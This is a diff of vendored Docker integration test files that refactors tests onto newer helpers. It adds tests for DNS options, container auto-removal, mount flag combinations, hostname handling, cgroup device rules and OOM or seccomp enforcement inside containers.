-	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+	cli.DockerCmd(c, "run", "--dns=1.2.3.4", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{
+		Out: expectedOutput,
+	})
 
 	expectedOutput = "search example.com"
-	out, _ = dockerCmd(c, "run", "--dns-search=example.com", "--net=host", "busybox", "cat", "/etc/resolv.conf")
-	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+	cli.DockerCmd(c, "run", "--dns-search=example.com", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{
+		Out: expectedOutput,
+	})
 
 	expectedOutput = "options timeout:3"
-	out, _ = dockerCmd(c, "run", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf")
-	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+	cli.DockerCmd(c, "run", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{
+		Out: expectedOutput,
+	})
 
 	expectedOutput1 := "nameserver 1.2.3.4"
 	expectedOutput2 := "search example.com"
 	expectedOutput3 := "options timeout:3"
-	out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--dns-search=example.com", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	out := cli.DockerCmd(c, "run", "--dns=1.2.3.4", "--dns-search=example.com", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf").Combined()
 	c.Assert(out, checker.Contains, expectedOutput1, check.Commentf("Expected '%s', but got %q", expectedOutput1, out))
 	c.Assert(out, checker.Contains, expectedOutput2, check.Commentf("Expected '%s', but got %q", expectedOutput2, out))
 	c.Assert(out, checker.Contains, expectedOutput3, check.Commentf("Expected '%s', but got %q", expectedOutput3, out))
@@ -4421,6 +4051,29 @@ func (s *DockerSuite) TestRunRmAndWait(c *check.C) {
 	c.Assert(code, checker.Equals, 0)
 }
 
+// Test that auto-remove is performed by the daemon (API 1.25 and above)
+func (s *DockerSuite) TestRunRm(c *check.C) {
+	name := "miss-me-when-im-gone"
+	cli.DockerCmd(c, "run", "--name="+name, "--rm", "busybox")
+
+	cli.Docker(cli.Inspect(name), cli.Format(".name")).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "No such object: " + name,
+	})
+}
+
+// Test that auto-remove is performed by the client on API versions that do not support daemon-side api-remove (API < 1.25)
+func (s *DockerSuite) TestRunRmPre125Api(c *check.C) {
+	name := "miss-me-when-im-gone"
+	envs := appendBaseEnv(os.Getenv("DOCKER_TLS_VERIFY") != "", "DOCKER_API_VERSION=1.24")
+	cli.Docker(cli.Args("run", "--name="+name, "--rm", "busybox"), cli.WithEnvironmentVariables(envs...)).Assert(c, icmd.Success)
+
+	cli.Docker(cli.Inspect(name), cli.Format(".name")).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "No such object: " + name,
+	})
+}
+
 // Test case for #23498
 func (s *DockerSuite) TestRunUnsetEntrypoint(c *check.C) {
 	testRequires(c, DaemonIsLinux)
@@ -4431,33 +4084,34 @@ RUN chmod 755 /entrypoint.sh
 ENTRYPOINT ["/entrypoint.sh"]
 CMD echo foobar`
 
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"entrypoint.sh": `#!/bin/sh
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"entrypoint.sh": `#!/bin/sh
 echo "I am an entrypoint"
 exec "$@"`,
-	})
-	c.Assert(err, check.IsNil)
+		}))
 	defer ctx.Close()
 
-	_, err = buildImageFromContext(name, ctx, true)
-	c.Assert(err, check.IsNil)
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
 
-	out, _ := dockerCmd(c, "run", "--entrypoint=", "-t", name, "echo", "foo")
+	out := cli.DockerCmd(c, "run", "--entrypoint=", "-t", name, "echo", "foo").Combined()
 	c.Assert(strings.TrimSpace(out), check.Equals, "foo")
 
 	// CMD will be reset as well (the same as setting a custom entrypoint)
-	_, _, err = dockerCmdWithError("run", "--entrypoint=", "-t", name)
-	c.Assert(err, check.NotNil)
-	c.Assert(err.Error(), checker.Contains, "No command specified")
+	cli.Docker(cli.Args("run", "--entrypoint=", "-t", name)).Assert(c, icmd.Expected{
+		ExitCode: 125,
+		Err:      "No command specified",
+	})
 }
 
 func (s *DockerDaemonSuite) TestRunWithUlimitAndDaemonDefault(c *check.C) {
-	c.Assert(s.d.StartWithBusybox("--debug", "--default-ulimit=nofile=65535"), checker.IsNil)
+	s.d.StartWithBusybox(c, "--debug", "--default-ulimit=nofile=65535")
 
 	name := "test-A"
 	_, err := s.d.Cmd("run", "--name", name, "-d", "busybox", "top")
 	c.Assert(err, checker.IsNil)
-	c.Assert(s.d.waitRun(name), check.IsNil)
+	c.Assert(s.d.WaitRun(name), check.IsNil)
 
 	out, err := s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name)
 	c.Assert(err, checker.IsNil)
@@ -4466,7 +4120,7 @@ func (s *DockerDaemonSuite) TestRunWithUlimitAndDaemonDefault(c *check.C) {
 	name = "test-B"
 	_, err = s.d.Cmd("run", "--name", name, "--ulimit=nofile=42", "-d", "busybox", "top")
 	c.Assert(err, checker.IsNil)
-	c.Assert(s.d.waitRun(name), check.IsNil)
+	c.Assert(s.d.WaitRun(name), check.IsNil)
 
 	out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name)
 	c.Assert(err, checker.IsNil)
@@ -4479,7 +4133,7 @@ func (s *DockerSuite) TestRunStoppedLoggingDriverNoLeak(c *check.C) {
 
 	out, _, err := dockerCmdWithError("run", "--name=fail", "--log-driver=splunk", "busybox", "true")
 	c.Assert(err, checker.NotNil)
-	c.Assert(out, checker.Contains, "Failed to initialize logging driver", check.Commentf("error should be about logging driver, got output %s", out))
+	c.Assert(out, checker.Contains, "failed to initialize logging driver", check.Commentf("error should be about logging driver, got output %s", out))
 
 	// NGoroutines is not updated right away, so we need to wait before failing
 	c.Assert(waitForGoroutines(nroutines), checker.IsNil)
@@ -4510,29 +4164,10 @@ func (s *DockerSuite) TestRunCredentialSpecFailures(c *check.C) {
 func (s *DockerSuite) TestRunCredentialSpecWellFormed(c *check.C) {
 	testRequires(c, DaemonIsWindows, SameHostDaemon)
 	validCS := readFile(`fixtures\credentialspecs\valid.json`, c)
-	writeFile(filepath.Join(dockerBasePath, `credentialspecs\valid.json`), validCS, c)
+	writeFile(filepath.Join(testEnv.DaemonInfo.DockerRootDir, `credentialspecs\valid.json`), validCS, c)
 	dockerCmd(c, "run", `--security-opt=credentialspec=file://valid.json`, "busybox", "true")
 }
 
-// Windows specific test to ensure that a servicing app container is started
-// if necessary once a container exits. It does this by forcing a no-op
-// servicing event and verifying the event from Hyper-V-Compute
-func (s *DockerSuite) TestRunServicingContainer(c *check.C) {
-	testRequires(c, DaemonIsWindows, SameHostDaemon)
-
-	out, _ := dockerCmd(c, "run", "-d", WindowsBaseImage, "cmd", "/c", "mkdir c:\\programdata\\Microsoft\\Windows\\ContainerUpdates\\000_000_d99f45d0-ffc8-4af7-bd9c-ea6a62e035c9_200 && sc control cexecsvc 255")
-	containerID := strings.TrimSpace(out)
-	err := waitExited(containerID, 60*time.Second)
-	c.Assert(err, checker.IsNil)
-
-	cmd := exec.Command("powershell", "echo", `(Get-WinEvent -ProviderName "Microsoft-Windows-Hyper-V-Compute" -FilterXPath 'Event[System[EventID=2010]]' -MaxEvents 1).Message`)
-	out2, _, err := runCommandWithOutput(cmd)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out2, checker.Contains, `"Servicing":true`, check.Commentf("Servicing container does not appear to have been started: %s", out2))
-	c.Assert(out2, checker.Contains, `Windows Container (Servicing)`, check.Commentf("Didn't find 'Windows Container (Servicing): %s", out2))
-	c.Assert(out2, checker.Contains, containerID+"_servicing", check.Commentf("Didn't find '%s_servicing': %s", containerID+"_servicing", out2))
-}
-
 func (s *DockerSuite) TestRunDuplicateMount(c *check.C) {
 	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
 
@@ -4642,16 +4277,18 @@ func (s *DockerSuite) TestSlowStdinClosing(c *check.C) {
 	name := "testslowstdinclosing"
 	repeat := 3 // regression happened 50% of the time
 	for i := 0; i < repeat; i++ {
-		cmd := exec.Command(dockerBinary, "run", "--rm", "--name", name, "-i", "busybox", "cat")
-		cmd.Stdin = &delayedReader{}
+		cmd := icmd.Cmd{
+			Command: []string{dockerBinary, "run", "--rm", "--name", name, "-i", "busybox", "cat"},
+			Stdin:   &delayedReader{},
+		}
 		done := make(chan error, 1)
 		go func() {
-			_, err := runCommand(cmd)
+			err := icmd.RunCmd(cmd).Error
 			done <- err
 		}()
 
 		select {
-		case <-time.After(15 * time.Second):
+		case <-time.After(30 * time.Second):
 			c.Fatal("running container timed out") // cleanup in teardown
 		case err := <-done:
 			c.Assert(err, checker.IsNil)
@@ -4668,7 +4305,7 @@ func (s *delayedReader) Read([]byte) (int, error) {
 
 // #28823 (originally #28639)
 func (s *DockerSuite) TestRunMountReadOnlyDevShm(c *check.C) {
-	testRequires(c, SameHostDaemon, DaemonIsLinux)
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
 	emptyDir, err := ioutil.TempDir("", "test-read-only-dev-shm")
 	c.Assert(err, check.IsNil)
 	defer os.RemoveAll(emptyDir)
@@ -4679,11 +4316,224 @@ func (s *DockerSuite) TestRunMountReadOnlyDevShm(c *check.C) {
 	c.Assert(out, checker.Contains, "Read-only file system")
 }
 
+func (s *DockerSuite) TestRunMount(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace)
+
+	// mnt1, mnt2, and testCatFooBar are commonly used in multiple test cases
+	tmpDir, err := ioutil.TempDir("", "mount")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+	mnt1, mnt2 := path.Join(tmpDir, "mnt1"), path.Join(tmpDir, "mnt2")
+	if err := os.Mkdir(mnt1, 0755); err != nil {
+		c.Fatal(err)
+	}
+	if err := os.Mkdir(mnt2, 0755); err != nil {
+		c.Fatal(err)
+	}
+	if err := ioutil.WriteFile(path.Join(mnt1, "test1"), []byte("test1"), 0644); err != nil {
+		c.Fatal(err)
+	}
+	if err := ioutil.WriteFile(path.Join(mnt2, "test2"), []byte("test2"), 0644); err != nil {
+		c.Fatal(err)
+	}
+	testCatFooBar := func(cName string) error {
+		out, _ := dockerCmd(c, "exec", cName, "cat", "/foo/test1")
+		if out != "test1" {
+			return fmt.Errorf("%s not mounted on /foo", mnt1)
+		}
+		out, _ = dockerCmd(c, "exec", cName, "cat", "/bar/test2")
+		if out != "test2" {
+			return fmt.Errorf("%s not mounted on /bar", mnt2)
+		}
+		return nil
+	}
+
+	type testCase struct {
+		equivalents [][]string
+		valid       bool
+		// fn should be nil if valid==false
+		fn func(cName string) error
+	}
+	cases := []testCase{
+		{
+			equivalents: [][]string{
+				{
+					"--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1),
+					"--mount", fmt.Sprintf("type=bind,src=%s,dst=/bar", mnt2),
+				},
+				{
+					"--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1),
+					"--mount", fmt.Sprintf("type=bind,src=%s,target=/bar", mnt2),
+				},
+				{
+					"--volume", mnt1 + ":/foo",
+					"--mount", fmt.Sprintf("type=bind,src=%s,target=/bar", mnt2),
+				},
+			},
+			valid: true,
+			fn:    testCatFooBar,
+		},
+		{
+			equivalents: [][]string{
+				{
+					"--mount", fmt.Sprintf("type=volume,src=%s,dst=/foo", mnt1),
+					"--mount", fmt.Sprintf("type=volume,src=%s,dst=/bar", mnt2),
+				},
+				{
+					"--mount", fmt.Sprintf("type=volume,src=%s,dst=/foo", mnt1),
+					"--mount", fmt.Sprintf("type=volume,src=%s,target=/bar", mnt2),
+				},
+			},
+			valid: false,
+		},
+		{
+			equivalents: [][]string{
+				{
+					"--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1),
+					"--mount", fmt.Sprintf("type=volume,src=%s,dst=/bar", mnt2),
+				},
+				{
+					"--volume", mnt1 + ":/foo",
+					"--mount", fmt.Sprintf("type=volume,src=%s,target=/bar", mnt2),
+				},
+			},
+			valid: false,
+			fn:    testCatFooBar,
+		},
+		{
+			equivalents: [][]string{
+				{
+					"--read-only",
+					"--mount", "type=volume,dst=/bar",
+				},
+			},
+			valid: true,
+			fn: func(cName string) error {
+				_, _, err := dockerCmdWithError("exec", cName, "touch", "/bar/icanwritehere")
+				return err
+			},
+		},
+		{
+			equivalents: [][]string{
+				{
+					"--read-only",
+					"--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1),
+					"--mount", "type=volume,dst=/bar",
+				},
+				{
+					"--read-only",
+					"--volume", fmt.Sprintf("%s:/foo", mnt1),
+					"--mount", "type=volume,dst=/bar",
+				},
+			},
+			valid: true,
+			fn: func(cName string) error {
+				out, _ := dockerCmd(c, "exec", cName, "cat", "/foo/test1")
+				if out != "test1" {
+					return fmt.Errorf("%s not mounted on /foo", mnt1)
+				}
+				_, _, err := dockerCmdWithError("exec", cName, "touch", "/bar/icanwritehere")
+				return err
+			},
+		},
+		{
+			equivalents: [][]string{
+				{
+					"--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1),
+					"--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt2),
+				},
+				{
+					"--mount", fmt.Sprintf("type=bind,src=%s,dst=/foo", mnt1),
+					"--mount", fmt.Sprintf("type=bind,src=%s,target=/foo", mnt2),
+				},
+				{
+					"--volume", fmt.Sprintf("%s:/foo", mnt1),
+					"--mount", fmt.Sprintf("type=bind,src=%s,target=/foo", mnt2),
+				},
+			},
+			valid: false,
+		},
+		{
+			equivalents: [][]string{
+				{
+					"--volume", fmt.Sprintf("%s:/foo", mnt1),
+					"--mount", fmt.Sprintf("type=volume,src=%s,target=/foo", mnt2),
+				},
+			},
+			valid: false,
+		},
+		{
+			equivalents: [][]string{
+				{
+					"--mount", "type=volume,target=/foo",
+					"--mount", "type=volume,target=/foo",
+				},
+			},
+			valid: false,
+		},
+	}
+
+	for i, testCase := range cases {
+		for j, opts := range testCase.equivalents {
+			cName := fmt.Sprintf("mount-%d-%d", i, j)
+			_, _, err := dockerCmdWithError(append([]string{"run", "-i", "-d", "--name", cName},
+				append(opts, []string{"busybox", "top"}...)...)...)
+			if testCase.valid {
+				c.Assert(err, check.IsNil,
+					check.Commentf("got error while creating a container with %v (%s)", opts, cName))
+				c.Assert(testCase.fn(cName), check.IsNil,
+					check.Commentf("got error while executing test for %v (%s)", opts, cName))
+				dockerCmd(c, "rm", "-f", cName)
+			} else {
+				c.Assert(err, checker.NotNil,
+					check.Commentf("got nil while creating a container with %v (%s)", opts, cName))
+			}
+		}
+	}
+}
+
+// Test that passing a FQDN as hostname properly sets hostname, and
+// /etc/hostname. Test case for 29100
+func (s *DockerSuite) TestRunHostnameFQDN(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	expectedOutput := "foobar.example.com\nfoobar.example.com\nfoobar\nexample.com\nfoobar.example.com"
+	out, _ := dockerCmd(c, "run", "--hostname=foobar.example.com", "busybox", "sh", "-c", `cat /etc/hostname && hostname && hostname -s && hostname -d && hostname -f`)
+	c.Assert(strings.TrimSpace(out), checker.Equals, expectedOutput)
+
+	out, _ = dockerCmd(c, "run", "--hostname=foobar.example.com", "busybox", "sh", "-c", `cat /etc/hosts`)
+	expectedOutput = "foobar.example.com foobar"
+	c.Assert(strings.TrimSpace(out), checker.Contains, expectedOutput)
+}
+
 // Test case for 29129
 func (s *DockerSuite) TestRunHostnameInHostMode(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
 
 	expectedOutput := "foobar\nfoobar"
 	out, _ := dockerCmd(c, "run", "--net=host", "--hostname=foobar", "busybox", "sh", "-c", `echo $HOSTNAME && hostname`)
 	c.Assert(strings.TrimSpace(out), checker.Equals, expectedOutput)
 }
+
+func (s *DockerSuite) TestRunAddDeviceCgroupRule(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	deviceRule := "c 7:128 rwm"
+
+	out, _ := dockerCmd(c, "run", "--rm", "busybox", "cat", "/sys/fs/cgroup/devices/devices.list")
+	if strings.Contains(out, deviceRule) {
+		c.Fatalf("%s shouldn't been in the device.list", deviceRule)
+	}
+
+	out, _ = dockerCmd(c, "run", "--rm", fmt.Sprintf("--device-cgroup-rule=%s", deviceRule), "busybox", "grep", deviceRule, "/sys/fs/cgroup/devices/devices.list")
+	c.Assert(strings.TrimSpace(out), checker.Equals, deviceRule)
+}
+
+// Verifies that running as local system is operating correctly on Windows
+func (s *DockerSuite) TestWindowsRunAsSystem(c *check.C) {
+	testRequires(c, DaemonIsWindowsAtLeastBuild(15000))
+	out, _ := dockerCmd(c, "run", "--net=none", `--user=nt authority\system`, "--hostname=XYZZY", minimalBaseImage(), "cmd", "/c", `@echo %USERNAME%`)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "XYZZY$")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go
index e346c19f8e..3444d22bfd 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go
@@ -4,6 +4,7 @@ package main
 
 import (
 	"bufio"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -16,13 +17,17 @@ import (
 	"syscall"
 	"time"
 
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/docker/docker/pkg/homedir"
-	"github.com/docker/docker/pkg/integration/checker"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/parsers"
 	"github.com/docker/docker/pkg/sysinfo"
 	"github.com/go-check/check"
 	"github.com/kr/pty"
+	"gotest.tools/icmd"
 )
 
 // #6509
@@ -71,9 +76,7 @@ func (s *DockerSuite) TestRunWithVolumesIsRecursive(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	defer f.Close()
 
-	runCmd := exec.Command(dockerBinary, "run", "--name", "test-data", "--volume", fmt.Sprintf("%s:/tmp:ro", tmpDir), "busybox:latest", "ls", "/tmp/tmpfs")
-	out, _, _, err := runCommandWithStdoutStderr(runCmd)
-	c.Assert(err, checker.IsNil)
+	out, _ := dockerCmd(c, "run", "--name", "test-data", "--volume", fmt.Sprintf("%s:/tmp:ro", tmpDir), "busybox:latest", "ls", "/tmp/tmpfs")
 	c.Assert(out, checker.Contains, filepath.Base(f.Name()), check.Commentf("Recursive bind mount test failed. Expected file not found"))
 }
 
@@ -90,7 +93,7 @@ func (s *DockerSuite) TestRunDeviceDirectory(c *check.C) {
 	c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "seq", check.Commentf("expected output /dev/othersnd/seq"))
 }
 
-// TestRunDetach checks attaching and detaching with the default escape sequence.
+// TestRunAttachDetach checks attaching and detaching with the default escape sequence.
 func (s *DockerSuite) TestRunAttachDetach(c *check.C) {
 	name := "attach-detach"
 
@@ -141,7 +144,7 @@ func (s *DockerSuite) TestRunAttachDetach(c *check.C) {
 	c.Assert(out, checker.Contains, "detach")
 }
 
-// TestRunDetach checks attaching and detaching with the escape sequence specified via flags.
+// TestRunAttachDetachFromFlag checks attaching and detaching with the escape sequence specified via flags.
 func (s *DockerSuite) TestRunAttachDetachFromFlag(c *check.C) {
 	name := "attach-detach"
 	keyCtrlA := []byte{1}
@@ -202,7 +205,7 @@ func (s *DockerSuite) TestRunAttachDetachFromFlag(c *check.C) {
 	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
 }
 
-// TestRunDetach checks attaching and detaching with the escape sequence specified via flags.
+// TestRunAttachDetachFromInvalidFlag checks attaching and detaching with the escape sequence specified via flags.
 func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) {
 	name := "attach-detach"
 	dockerCmd(c, "run", "--name", name, "-itd", "busybox", "top")
@@ -223,6 +226,7 @@ func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) {
 	if err := cmd.Start(); err != nil {
 		c.Fatal(err)
 	}
+	go cmd.Wait()
 
 	bufReader := bufio.NewReader(stdout)
 	out, err := bufReader.ReadString('\n')
@@ -230,11 +234,11 @@ func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) {
 		c.Fatal(err)
 	}
 	// it should print a warning to indicate the detach key flag is invalid
-	errStr := "Invalid escape keys (ctrl-A,a) provided"
+	errStr := "Invalid detach keys (ctrl-A,a) provided"
 	c.Assert(strings.TrimSpace(out), checker.Equals, errStr)
 }
 
-// TestRunDetach checks attaching and detaching with the escape sequence specified via config file.
+// TestRunAttachDetachFromConfig checks attaching and detaching with the escape sequence specified via config file.
 func (s *DockerSuite) TestRunAttachDetachFromConfig(c *check.C) {
 	keyCtrlA := []byte{1}
 	keyA := []byte{97}
@@ -317,7 +321,7 @@ func (s *DockerSuite) TestRunAttachDetachFromConfig(c *check.C) {
 	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
 }
 
-// TestRunDetach checks attaching and detaching with the detach flags, making sure it overrides config file
+// TestRunAttachDetachKeysOverrideConfig checks attaching and detaching with the detach flags, making sure it overrides config file
 func (s *DockerSuite) TestRunAttachDetachKeysOverrideConfig(c *check.C) {
 	keyCtrlA := []byte{1}
 	keyA := []byte{97}
@@ -421,6 +425,7 @@ func (s *DockerSuite) TestRunAttachInvalidDetachKeySequencePreserved(c *check.C)
 	if err := cmd.Start(); err != nil {
 		c.Fatal(err)
 	}
+	go cmd.Wait()
 	c.Assert(waitRun(name), check.IsNil)
 
 	// Invalid escape sequence aba, should print aba in output
@@ -495,11 +500,13 @@ func (s *DockerSuite) TestRunWithKernelMemory(c *check.C) {
 	testRequires(c, kernelMemorySupport)
 
 	file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes"
-	stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "--kernel-memory", "50M", "--name", "test1", "busybox", "cat", file)
-	c.Assert(strings.TrimSpace(stdout), checker.Equals, "52428800")
+	cli.DockerCmd(c, "run", "--kernel-memory", "50M", "--name", "test1", "busybox", "cat", file).Assert(c, icmd.Expected{
+		Out: "52428800",
+	})
 
-	out := inspectField(c, "test1", "HostConfig.KernelMemory")
-	c.Assert(out, check.Equals, "52428800")
+	cli.InspectCmd(c, "test1", cli.Format(".HostConfig.KernelMemory")).Assert(c, icmd.Expected{
+		Out: "52428800",
+	})
 }
 
 func (s *DockerSuite) TestRunWithInvalidKernelMemory(c *check.C) {
@@ -531,8 +538,9 @@ func (s *DockerSuite) TestRunWithCPUShares(c *check.C) {
 func (s *DockerSuite) TestRunEchoStdoutWithCPUSharesAndMemoryLimit(c *check.C) {
 	testRequires(c, cpuShare)
 	testRequires(c, memoryLimitSupport)
-	out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--cpu-shares", "1000", "-m", "32m", "busybox", "echo", "test")
-	c.Assert(out, checker.Equals, "test\n", check.Commentf("container should've printed 'test'"))
+	cli.DockerCmd(c, "run", "--cpu-shares", "1000", "-m", "32m", "busybox", "echo", "test").Assert(c, icmd.Expected{
+		Out: "test\n",
+	})
 }
 
 func (s *DockerSuite) TestRunWithCpusetCpus(c *check.C) {
@@ -607,11 +615,12 @@ func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceWriteIOps(c *check.C)
 }
 
 func (s *DockerSuite) TestRunOOMExitCode(c *check.C) {
-	testRequires(c, memoryLimitSupport, swapMemorySupport)
+	testRequires(c, memoryLimitSupport, swapMemorySupport, NotPpc64le)
 	errChan := make(chan error)
 	go func() {
 		defer close(errChan)
-		out, exitCode, _ := dockerCmdWithError("run", "-m", "4MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done")
+		// memory limit lower than 8MB will raise an error of "device or resource busy" from docker-runc.
+		out, exitCode, _ := dockerCmdWithError("run", "-m", "8MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done")
 		if expected := 137; exitCode != expected {
 			errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out)
 		}
@@ -629,11 +638,12 @@ func (s *DockerSuite) TestRunWithMemoryLimit(c *check.C) {
 	testRequires(c, memoryLimitSupport)
 
 	file := "/sys/fs/cgroup/memory/memory.limit_in_bytes"
-	stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "-m", "32M", "--name", "test", "busybox", "cat", file)
-	c.Assert(strings.TrimSpace(stdout), checker.Equals, "33554432")
-
-	out := inspectField(c, "test", "HostConfig.Memory")
-	c.Assert(out, check.Equals, "33554432")
+	cli.DockerCmd(c, "run", "-m", "32M", "--name", "test", "busybox", "cat", file).Assert(c, icmd.Expected{
+		Out: "33554432",
+	})
+	cli.InspectCmd(c, "test", cli.Format(".HostConfig.Memory")).Assert(c, icmd.Expected{
+		Out: "33554432",
+	})
 }
 
 // TestRunWithoutMemoryswapLimit sets memory limit and disables swap
@@ -670,7 +680,7 @@ func (s *DockerSuite) TestRunWithSwappinessInvalid(c *check.C) {
 }
 
 func (s *DockerSuite) TestRunWithMemoryReservation(c *check.C) {
-	testRequires(c, memoryReservationSupport)
+	testRequires(c, SameHostDaemon, memoryReservationSupport)
 
 	file := "/sys/fs/cgroup/memory/memory.soft_limit_in_bytes"
 	out, _ := dockerCmd(c, "run", "--memory-reservation", "200M", "--name", "test", "busybox", "cat", file)
@@ -682,7 +692,7 @@ func (s *DockerSuite) TestRunWithMemoryReservation(c *check.C) {
 
 func (s *DockerSuite) TestRunWithMemoryReservationInvalid(c *check.C) {
 	testRequires(c, memoryLimitSupport)
-	testRequires(c, memoryReservationSupport)
+	testRequires(c, SameHostDaemon, memoryReservationSupport)
 	out, _, err := dockerCmdWithError("run", "-m", "500M", "--memory-reservation", "800M", "busybox", "true")
 	c.Assert(err, check.NotNil)
 	expected := "Minimum memory limit can not be less than memory reservation limit"
@@ -829,17 +839,11 @@ func (s *DockerSuite) TestRunTmpfsMounts(c *check.C) {
 
 func (s *DockerSuite) TestRunTmpfsMountsOverrideImageVolumes(c *check.C) {
 	name := "img-with-volumes"
-	_, err := buildImage(
-		name,
-		`
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
     FROM busybox
     VOLUME /run
     RUN touch /run/stuff
-    `,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+    `))
 	out, _ := dockerCmd(c, "run", "--tmpfs", "/run", name, "ls", "/run")
 	c.Assert(out, checker.Not(checker.Contains), "stuff")
 }
@@ -886,7 +890,6 @@ func (s *DockerSuite) TestRunTmpfsMountsWithOptions(c *check.C) {
 }
 
 func (s *DockerSuite) TestRunSysctls(c *check.C) {
-
 	testRequires(c, DaemonIsLinux)
 	var err error
 
@@ -909,11 +912,11 @@ func (s *DockerSuite) TestRunSysctls(c *check.C) {
 	c.Assert(err, check.IsNil)
 	c.Assert(sysctls["net.ipv4.ip_forward"], check.Equals, "0")
 
-	runCmd := exec.Command(dockerBinary, "run", "--sysctl", "kernel.foobar=1", "--name", "test2", "busybox", "cat", "/proc/sys/kernel/foobar")
-	out, _, _ = runCommandWithOutput(runCmd)
-	if !strings.Contains(out, "invalid argument") {
-		c.Fatalf("expected --sysctl to fail, got %s", out)
-	}
+	icmd.RunCommand(dockerBinary, "run", "--sysctl", "kernel.foobar=1", "--name", "test2",
+		"busybox", "cat", "/proc/sys/kernel/foobar").Assert(c, icmd.Expected{
+		ExitCode: 125,
+		Err:      "invalid argument",
+	})
 }
 
 // TestRunSeccompProfileDenyUnshare checks that 'docker run --security-opt seccomp=/tmp/profile.json debian:jessie unshare' exits with operation not permitted.
@@ -937,11 +940,12 @@ func (s *DockerSuite) TestRunSeccompProfileDenyUnshare(c *check.C) {
 	if _, err := tmpFile.Write([]byte(jsonData)); err != nil {
 		c.Fatal(err)
 	}
-	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc")
-	out, _, _ := runCommandWithOutput(runCmd)
-	if !strings.Contains(out, "Operation not permitted") {
-		c.Fatalf("expected unshare with seccomp profile denied to fail, got %s", out)
-	}
+	icmd.RunCommand(dockerBinary, "run", "--security-opt", "apparmor=unconfined",
+		"--security-opt", "seccomp="+tmpFile.Name(),
+		"debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 }
 
 // TestRunSeccompProfileDenyChmod checks that 'docker run --security-opt seccomp=/tmp/profile.json busybox chmod 400 /etc/hostname' exits with operation not permitted.
@@ -971,15 +975,15 @@ func (s *DockerSuite) TestRunSeccompProfileDenyChmod(c *check.C) {
 	if _, err := tmpFile.Write([]byte(jsonData)); err != nil {
 		c.Fatal(err)
 	}
-	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "400", "/etc/hostname")
-	out, _, _ := runCommandWithOutput(runCmd)
-	if !strings.Contains(out, "Operation not permitted") {
